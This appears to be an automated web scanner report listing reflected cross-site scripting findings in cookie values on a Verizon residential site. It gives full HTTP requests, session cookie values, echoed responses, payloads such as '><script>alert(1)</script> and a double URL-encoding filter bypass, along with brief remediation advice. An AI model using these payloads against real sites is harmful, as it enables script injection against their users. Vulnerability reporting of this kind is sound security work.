This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /residential/bundles/bundlesoverview/bundlesoverview.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX4afcd<script>alert(1)</script>f5636ef73be; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload e9210<script>alert(1)</script>17637724fdd was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /residential/bundles/overview HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXe9210<script>alert(1)</script>17637724fdd; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e8e6'><script>alert(1)</script>b8d520065ab was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /residential/bundles/overview HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX4e8e6'><script>alert(1)</script>b8d520065ab; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 6913f<script>alert(1)</script>c0ed5cd13fb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /residential/internet HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX6913f<script>alert(1)</script>c0ed5cd13fb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 73111 Expires: Sat, 20 Nov 2010 00:16:32 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:32 GMT Connection: close Set-Cookie: ContextInfo_State=TX6913f<script>alert(1)</script>c0ed5cd13fb; path=/ Set-Cookie: ContextInfo_LoopQual=; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Internet </title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TX6913F<SCRIPT>ALERT(1)</SCRIPT>C0ED5CD13FB </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf607'><script>alert(1)</script>af83f93894c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /residential/internet HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXbf607'><script>alert(1)</script>af83f93894c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 73115 Expires: Sat, 20 Nov 2010 00:16:28 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:28 GMT Connection: close Set-Cookie: ContextInfo_State=TXbf607'><script>alert(1)</script>af83f93894c; path=/ Set-Cookie: ContextInfo_LoopQual=; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Internet </title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet ...[SNIP]... <input type='hidden' id='locationInfo' value='TXBF607'><SCRIPT>ALERT(1)</SCRIPT>AF83F93894C ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e20b%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efd5bffbcc6f was submitted in the vzapps cookie. This input was echoed as 4e20b"><img src=a onerror=alert(1)>fd5bffbcc6f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the vzapps cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /residential/specialoffers/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX4e20b%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efd5bffbcc6f; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET ETag: X-Powered-By: ASP.NET Content-Type: text/html Expires: Sat, 20 Nov 2010 00:15:44 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:15:44 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: ASPSESSIONIDQQCTSBDQ=IGIKCPNBAEMHJEFBAIDLEPPI; path=/ Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660;path=/ Content-Length: 126538
<!-- Vignette V6 Fri Nov 19 16:15:44 2010 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head>
The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload 4fea9<script>alert(1)</script>38ddcfffc57 was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload bbbc1<script>alert(1)</script>763928accef was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload efb2c<script>alert(1)</script>d7c9c2d6cea was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 55f0d<script>alert(1)</script>c68ab98df45 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /residentialhelp/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX55f0d<script>alert(1)</script>c68ab98df45; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 175791 Expires: Sat, 20 Nov 2010 00:22:06 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:22:06 GMT Connection: close
<HTML xmlns:vz> <HEAD id="ctl00_head"><title> Verizon | Residential Support </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /><meta content="Microsoft Vis ...[SNIP]... </strong>, TX55f0d<script>alert(1)</script>c68ab98df45 </span> ...[SNIP]...
The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload f9aa6<script>alert(1)</script>cdcfbe4067 was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload eab60<script>alert(1)</script>0a0f7cbd88c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 668a0'><script>alert(1)</script>fc8df7db051 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 165a7'><script>alert(1)</script>638a1bf81ed was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 9afbe<script>alert(1)</script>42141e4a677 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adc43"-alert(1)-"8aa6b87ac33 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head"><meta http-equiv="X-UA-Compatible ...[SNIP]... <script type="text/javascript"> function startmenu() { } var mvzOptIn="N"; var strdotcomval = "adc43"-alert(1)-"8aa6b87ac33" if(mvzOptIn != 'Y' || strdotcomval == "") { var m_view = new VZT.MasterNavView(); var m_model = {container: docu ...[SNIP]...
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 72a2a'><script>alert(1)</script>3f33f50afae was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 8b27c<script>alert(1)</script>9b933fecabb was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 429f7'><script>alert(1)</script>ffc246269ca was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8315"-alert(1)-"72b07553601 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head"><meta http-equiv="X-UA-Compatible ...[SNIP]... <script type="text/javascript"> function startmenu() { } var mvzOptIn="N"; var strdotcomval = "a8315"-alert(1)-"72b07553601" if(mvzOptIn != 'Y' || strdotcomval == "") { var m_view = new VZT.MasterNavView(); var m_model = {container: docu ...[SNIP]...
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload ee9d4<script>alert(1)</script>d473025d44e was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c19d5'><script>alert(1)</script>36277642c37 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29ff7"-alert(1)-"213bd3ed367 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 161440 Expires: Sat, 20 Nov 2010 03:00:39 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 03:00:39 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head"><meta http-equiv="X-UA-Compatible ...[SNIP]... <script type="text/javascript"> function startmenu() { } var mvzOptIn="N"; var strdotcomval = "29ff7"-alert(1)-"213bd3ed367" if(mvzOptIn != 'Y' || strdotcomval == "") { var m_view = new VZT.MasterNavView(); var m_model = {container: document.getElementB ...[SNIP]...
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 86006<script>alert(1)</script>84bd500f181 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f06b1'><script>alert(1)</script>fc2813f1a29 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b10ba"-alert(1)-"93515101fac was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head"><meta http-equiv="X-UA-Compatible ...[SNIP]... <script type="text/javascript"> function startmenu() { } var mvzOptIn="N"; var strdotcomval = "b10ba"-alert(1)-"93515101fac" if(mvzOptIn != 'Y' || strdotcomval == "") { var m_view = new VZT.MasterNavView(); var m_model = {container: document.getElementB ...[SNIP]...
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dcef1'><script>alert(1)</script>614ae10fb65 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload c9efe<script>alert(1)</script>6775dca418 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb6fd"-alert(1)-"6d30b2026af was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head"><meta http-equiv="X-UA-Compatible ...[SNIP]... <script type="text/javascript"> function startmenu() { } var mvzOptIn="N"; var strdotcomval = "bb6fd"-alert(1)-"6d30b2026af" if(mvzOptIn != 'Y' || strdotcomval == "") { var m_view = new VZT.MasterNavView(); var m_model = {container: docu ...[SNIP]...
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d6663'><script>alert(1)</script>7127b0cbbb7 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 3c7ba<script>alert(1)</script>61b8323e3a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7319b'><script>alert(1)</script>b412aee3463 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 226d7"-alert(1)-"1d917d73025 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
